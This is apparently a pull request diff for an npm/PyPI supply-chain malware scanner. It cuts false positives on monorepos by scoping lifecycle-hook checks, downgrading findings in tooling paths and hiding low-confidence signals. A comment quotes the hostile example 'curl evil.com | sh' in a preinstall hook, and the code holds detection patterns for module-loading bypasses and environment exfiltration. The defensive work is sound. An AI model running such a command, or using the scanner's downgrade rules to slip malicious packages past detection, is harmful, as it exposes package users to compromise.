### PR TITLE
v2.11.11 - monorepo FP reduction

### DIFF
--- a/package-lock.json
+++ b/package-lock.json
@@ -1,12 +1,12 @@
 {
   "name": "muaddib-scanner",
-  "version": "2.11.10",
+  "version": "2.11.12",
   "lockfileVersion": 3,
   "requires": true,
   "packages": {
     "": {
       "name": "muaddib-scanner",
-      "version": "2.11.10",
+      "version": "2.11.12",
       "license": "MIT",
       "dependencies": {
         "@inquirer/prompts": "8.4.2",

--- a/package.json
+++ b/package.json
@@ -1,6 +1,6 @@
 {
   "name": "muaddib-scanner",
-  "version": "2.11.10",
+  "version": "2.11.12",
   "description": "Supply-chain threat detection & response for npm & PyPI/Python",
   "main": "src/index.js",
   "bin": {

--- a/src/output/formatter.js
+++ b/src/output/formatter.js
@@ -157,18 +157,31 @@ function formatOutput(result, options, ctx) {
     if (deduped.length === 0) {
       console.log('[OK] No threats detected.\n');
     } else {
-      console.log(`[ALERT] ${deduped.length} threat(s) detected:\n`);
-      deduped.forEach((t, i) => {
-        const countStr = t.count > 1 ? ` (x${t.count})` : '';
-        console.log(`  ${i + 1}. [${t.severity}] ${t.type}${countStr}`);
-        console.log(`     ${t.message}`);
-        console.log(`     File: ${t.file}`);
-        const playbook = getPlaybook(t.type);
-        if (playbook) {
-          console.log(`     \u2192 ${playbook}`);
+      // v2.11.11: Filter degraded LOW quick-scan signals from default output.
+      // These are regex-only detections in overflow files (no AST context) and
+      // clutter the output on monorepos. Show with --verbose. Scoring, JSON,
+      // SARIF, and HTML output are unaffected — this is display-only.
+      const hiddenCount = options.verbose ? 0 : deduped.filter(t => t.degraded && t.severity === 'LOW').length;
+      const displayThreats = options.verbose ? deduped : deduped.filter(t => !(t.degraded && t.severity === 'LOW'));
+      if (displayThreats.length === 0 && hiddenCount > 0) {
+        console.log(`[OK] No high-confidence threats detected (${hiddenCount} low-confidence signal(s) hidden, use --verbose to show).\n`);
+      } else {
+        console.log(`[ALERT] ${displayThreats.length} threat(s) detected:\n`);
+        displayThreats.forEach((t, i) => {
+          const countStr = t.count > 1 ? ` (x${t.count})` : '';
+          console.log(`  ${i + 1}. [${t.severity}] ${t.type}${countStr}`);
+          console.log(`     ${t.message}`);
+          console.log(`     File: ${t.file}`);
+          const playbook = getPlaybook(t.type);
+          if (playbook) {
+            console.log(`     \u2192 ${playbook}`);
+          }
+          console.log('');
+        });
+        if (hiddenCount > 0) {
+          console.log(`  + ${hiddenCount} low-confidence signal(s) hidden (use --verbose to show)\n`);
         }
-        console.log('');
-      });
+      }
     }
 
     // Sandbox section (normal)

--- a/src/pipeline/executor.js
+++ b/src/pipeline/executor.js
@@ -256,17 +256,26 @@ async function execute(targetPath, options, pythonDeps, warnings) {
       { re: /\bprocess\.mainModule\b/, type: 'dynamic_require', severity: 'MEDIUM', label: 'process.mainModule' },
       { re: /\bModule\._load\b/, type: 'module_load_bypass', severity: 'CRITICAL', label: 'Module._load' }
     ];
+    // v2.11.11: Tooling path detection for quick-scan. Files in standard monorepo
+    // tooling directories (scripts/, test/, examples/, .github/, compiler/) carry
+    // much lower signal than root/src files — build/CI/test scripts legitimately
+    // use child_process. Downgrade non-CRITICAL findings to LOW in these paths.
+    // Module._load remains CRITICAL — it is never legitimate in tooling scripts.
+    const TOOLING_PATH_RE = /(?:^|[/\\])(?:scripts|test|tests|__tests__|spec|examples|fixtures|compiler[/\\]scripts|\.github)[/\\]/i;
     for (const filePath of overflowFiles) {
       try {
         const stat = fs.statSync(filePath);
         if (stat.size > getMaxFileSize()) continue;
         const content = fs.readFileSync(filePath, 'utf8');
         const relFile = path.relative(targetPath, filePath);
+        const isToolingPath = TOOLING_PATH_RE.test(relFile);
         for (const pat of QUICK_SCAN_PATTERNS) {
           if (pat.re.test(content)) {
+            // Downgrade non-CRITICAL findings in tooling paths to LOW
+            const severity = (isToolingPath && pat.severity !== 'CRITICAL') ? 'LOW' : pat.severity;
             quickScanThreats.push({
               type: pat.type,
-              severity: pat.severity,
+              severity,
               message: `[quick-scan] ${pat.label} detected in overflow file.`,
               file: relFile,
               degraded: true,  // P3: regex-only detection, no semantic context

--- a/src/pipeline/processor.js
+++ b/src/pipeline/processor.js
@@ -321,7 +321,7 @@ async function process(threats, targetPath, options, pythonDeps, warnings, scann
   // Compound scoring: inject synthetic CRITICAL threats when co-occurring types
   // indicate unambiguous malice. Applied AFTER FP reductions to recover signals
   // that were individually downgraded (count-based, dist, reachability, delta).
-  applyCompoundBoosts(deduped);
+  applyCompoundBoosts(deduped, targetPath);
 
   // Intent coherence analysis: detect source→sink pairs within files
   // Pass targetPath for destination-aware SDK pattern detection

--- a/src/scanner/dataflow.js
+++ b/src/scanner/dataflow.js
@@ -458,7 +458,11 @@ function analyzeFile(content, filePath, basePath) {
         }
       }
 
-      if (callName === 'request' || callName === 'fetch' || callName === 'post' || callName === 'get') {
+      // v2.11.11: Removed bare 'get' — getCallName() returns just the method name
+      // for member expressions (Map.get(), cache.get() → 'get'), causing massive FP
+      // on any file that calls .get(). Qualified http.get/https.get are already
+      // caught by MODULE_SINK_METHODS (lines 33-34) via taint-tracked module analysis.
+      if (callName === 'request' || callName === 'fetch' || callName === 'post') {
         sinks.push({
           type: 'network_send',
           name: callName,

--- a/src/scoring.js
+++ b/src/scoring.js
@@ -515,17 +515,27 @@ const SCORING_COMPOUNDS = [
     // C7 : when every component lives only in dist/build/out, the cooccurrence
     // is bundler aggregation (a postinstall mention + a pre-bundled HTTP client
     // with credential fields), not real exfiltration. Skip the compound.
-    excludeIfBundled: true
+    excludeIfBundled: true,
+    // v2.11.11: Scope to lifecycle target file + 1-level imports. On monorepos
+    // (React, Next.js) the unscoped co-occurrence of lifecycle_script + any
+    // suspicious_dataflow anywhere in the repo is noise. The compound should
+    // only fire when the dataflow signal is in the file directly executed by
+    // the lifecycle script or in its static imports.
+    lifecycleScoped: true
   },
   {
     type: 'lifecycle_dangerous_exec',
     requires: ['lifecycle_script', 'dangerous_exec'],
     severity: 'CRITICAL',
     message: 'Lifecycle hook + dangerous shell execution — install-time command injection (scoring compound).',
-    fileFrom: 'dangerous_exec'
+    fileFrom: 'dangerous_exec',
     // No sameFile: lifecycle is package-level
     // dangerous_exec is in DIST_EXEMPT_TYPES so it is never coincidental in
     // dist/ ; no excludeIfBundled gate added here.
+    // v2.11.11: Scope to lifecycle target file + 1-level imports. Without this,
+    // a monorepo postinstall referencing a clean setup script correlates with
+    // exec() in unrelated release/CI scripts → CRITICAL false positive.
+    lifecycleScoped: true
   },
   {
     type: 'obfuscated_lifecycle_env',
@@ -595,13 +605,117 @@ const SCORING_COMPOUNDS = [
   },
 ];
 
+// v2.11.11: Extract static require/import targets from a JS file (1 level).
+// Returns a Set of relative file paths (normalized with forward slashes).
+const _acorn = require('acorn');
+const _acornWalk = require('acorn-walk');
+
+function _extractStaticImports(filePath) {
+  const imports = new Set();
+  try {
+    const content = require('fs').readFileSync(filePath, 'utf8');
+    const ast = _acorn.parse(content, { sourceType: 'module', ecmaVersion: 'latest', allowReturnOutsideFunction: true, allowImportExportEverywhere: true });
+    _acornWalk.simple(ast, {
+      CallExpression(node) {
+        if (node.callee.type === 'Identifier' && node.callee.name === 'require' &&
+            node.arguments.length > 0 && node.arguments[0].type === 'Literal' &&
+            typeof node.arguments[0].value === 'string') {
+          const target = node.arguments[0].value;
+          if (target.startsWith('.')) imports.add(target);
+        }
+      },
+      ImportDeclaration(node) {
+        if (node.source && typeof node.source.value === 'string' && node.source.value.startsWith('.')) {
+          imports.add(node.source.value);
+        }
+      }
+    });
+  } catch { /* parse failure — return empty set */ }
+  return imports;
+}
+
+// v2.11.11: Lifecycle scope resolution. Determines if a lifecycleScoped compound
+// should fire based on whether the non-lifecycle threats are in the lifecycle
+// target file or its direct static imports.
+// Returns: 'pass' (compound should fire), 'skip' (no match in scope), 'unscoped' (can't resolve target)
+const _NODE_FILE_RE = /\bnode\s+(?:\.\/)?([^\s"';&|]+\.(?:js|mjs|cjs))\b/;
+
+function _resolveLifecycleScopeGate(compound, threats, targetPath) {
+  const fs = require('fs');
+  const pathMod = require('path');
+
+  // 1. Extract lifecycle target files from lifecycle_script threats + package.json
+  const lifecycleTargetFiles = new Set();
+  const lifecycleThreats = threats.filter(t => t.type === 'lifecycle_script');
+  for (const lt of lifecycleThreats) {
+    const match = lt.message && _NODE_FILE_RE.exec(lt.message);
+    if (match) lifecycleTargetFiles.add(match[1]);
+  }
+
+  // Also read package.json directly for robustness
+  try {
+    const pkgPath = pathMod.join(targetPath, 'package.json');
+    if (fs.existsSync(pkgPath)) {
+      const pkgData = JSON.parse(fs.readFileSync(pkgPath, 'utf8'));
+      const scripts = pkgData.scripts || {};
+      const LIFECYCLE_NAMES = ['preinstall', 'install', 'postinstall', 'preuninstall', 'postuninstall', 'prepare'];
+      for (const name of LIFECYCLE_NAMES) {
+        if (scripts[name]) {
+          const m = _NODE_FILE_RE.exec(scripts[name]);
+          if (m) lifecycleTargetFiles.add(m[1]);
+        }
+      }
+    }
+  } catch { /* ignore */ }
+
+  // 2. If no target file extractable, return 'unscoped'
+  if (lifecycleTargetFiles.size === 0) return 'unscoped';
+
+  // 3. Build the scoped file set: target files + their 1-level static imports
+  const scopedFiles = new Set();
+  for (const relTarget of lifecycleTargetFiles) {
+    const normalized = relTarget.replace(/\\/g, '/');
+    scopedFiles.add(normalized);
+    // Parse the target file and extract its static imports
+    const absTarget = pathMod.resolve(targetPath, relTarget);
+    const imports = _extractStaticImports(absTarget);
+    for (const imp of imports) {
+      // Resolve relative import against the target file's directory
+      const impDir = pathMod.dirname(absTarget);
+      let resolved = pathMod.relative(targetPath, pathMod.resolve(impDir, imp)).replace(/\\/g, '/');
+      // Try with .js extension if not present
+      if (!resolved.match(/\.(js|mjs|cjs)$/)) {
+        if (fs.existsSync(pathMod.resolve(targetPath, resolved + '.js'))) {
+          resolved += '.js';
+        } else if (fs.existsSync(pathMod.resolve(targetPath, resolved, 'index.js'))) {
+          resolved = resolved + '/index.js';
+        }
+      }
+      scopedFiles.add(resolved);
+    }
+  }
+
+  // 4. Check if any non-lifecycle required type has a threat in the scoped file set
+  const nonLifecycleReqs = compound.requires.filter(r => r !== 'lifecycle_script');
+  for (const req of nonLifecycleReqs) {
+    const reqThreats = threats.filter(t => t.type === req && t.file);
+    for (const t of reqThreats) {
+      const normalizedFile = t.file.replace(/\\/g, '/');
+      if (scopedFiles.has(normalizedFile)) return 'pass';
+    }
+  }
+
+  return 'skip';
+}
+
 /**
  * Apply compound boost rules: inject synthetic CRITICAL threats when
  * co-occurring threat types indicate unambiguous malice.
  * Called AFTER applyFPReductions to recover individually-downgraded signals.
  * @param {Array} threats - deduplicated threat array (mutated in place)
+ * @param {string} [targetPath] - scan target directory (for lifecycle scope resolution)
  */
-function applyCompoundBoosts(threats) {
+function applyCompoundBoosts(threats, targetPath) {
   const typeSet = new Set(threats.map(t => t.type));
 
   // Build map of type → first file encountered (for file assignment)
@@ -659,6 +773,36 @@ function applyCompoundBoosts(threats) {
         threats.some(t => t.type === req && t.file && t.file !== 'package.json')
       );
       if (anyFileBearing && allComponentsBundled) continue;
+    }
+
+    // v2.11.11: Lifecycle scope gate. For compounds with lifecycleScoped: true,
+    // the non-lifecycle required type must have at least one threat in the file
+    // directly executed by the lifecycle script OR in its static imports (1 level).
+    // On monorepos, unscoped co-occurrence (lifecycle in package.json + exec in
+    // scripts/release/publish.js) is noise. Fallback: when no target file can be
+    // extracted (e.g. "npm run build"), the compound fires with severity capped
+    // at HIGH and tagged unscopedCompound so the floor-50 logic skips it.
+    if (compound.lifecycleScoped && targetPath) {
+      const scopeResult = _resolveLifecycleScopeGate(compound, threats, targetPath);
+      if (scopeResult === 'skip') continue;
+      if (scopeResult === 'unscoped') {
+        // Can't extract target file — fire but cap severity and tag
+        if (!compoundAlreadyPresent) {
+          const cappedSeverity = compound.severity === 'CRITICAL' ? 'HIGH' : compound.severity;
+          threats.push({
+            type: compound.type,
+            severity: cappedSeverity,
+            message: compound.message + ' (unscoped — lifecycle target not resolvable)',
+            file: typeFileMap[compound.fileFrom] || '(unknown)',
+            count: 1,
+            compound: true,
+            unscopedCompound: true
+          });
+          typeSet.add(compound.type);
+        }
+        continue; // skip the normal push below — already handled
+      }
+      // scopeResult === 'pass' — compound fires normally
     }
 
     // Same-file constraint: required types must appear in at least one common file.
@@ -1139,7 +1283,9 @@ function calculateRiskScore(deduped, intentResult) {
   let packageScore = computeGroupScore(packageLevelThreats);
   // Floor: CRITICAL package-level threats (lifecycle_shell_pipe, IOC match) → minimum HIGH (50)
   // A single "curl evil.com | sh" in preinstall = 25 points = MEDIUM without floor.
-  if (packageScore >= 25 && packageLevelThreats.some(t => t.severity === 'CRITICAL')) {
+  // v2.11.11: unscopedCompound threats (lifecycle target not resolvable) are excluded from
+  // the floor — they represent uncertain correlations that should not inflate the score.
+  if (packageScore >= 25 && packageLevelThreats.some(t => t.severity === 'CRITICAL' && !t.unscopedCompound)) {
     packageScore = Math.max(packageScore, 50);
   }
   // v2.10.94: Co-occurrence floor — 2+ distinct CRITICAL package-level types (different
@@ -1147,7 +1293,7 @@ function calculateRiskScore(deduped, intentResult) {
   // (CRITICAL tier) so the final risk level reflects real severity instead of stopping
   // at HIGH. Catches apache-arrow-14 (curl_env_exfil + lifecycle_env_exfil compound).
   const criticalPkgTypes = new Set(
-    packageLevelThreats.filter(t => t.severity === 'CRITICAL').map(t => t.type)
+    packageLevelThreats.filter(t => t.severity === 'CRITICAL' && !t.unscopedCompound).map(t => t.type)
   );
   if (criticalPkgTypes.size >= 2) {
     packageScore = Math.max(packageScore, 75);
@@ -1176,7 +1322,7 @@ function calculateRiskScore(deduped, intentResult) {
   const boostPackageThreats = deduped.filter(t => isPackageLevelThreat(t) && t.boostSignal);
   if (boostPackageThreats.length > 0) {
     packageScore = computeGroupScore([...packageLevelThreats, ...boostPackageThreats]);
-    if (packageScore >= 25 && [...packageLevelThreats, ...boostPackageThreats].some(t => t.severity === 'CRITICAL')) {
+    if (packageScore >= 25 && [...packageLevelThreats, ...boostPackageThreats].some(t => t.severity === 'CRITICAL' && !t.unscopedCompound)) {
       packageScore = Math.max(packageScore, 50);
     }
   }


### PR DESCRIPTION
4 fixes: scope lifecycle compounds to target file + 1-level imports, remove bare get from dataflow sinks, tooling path downgrade on quick-scan, hide degraded LOW in CLI. 3438 tests passed.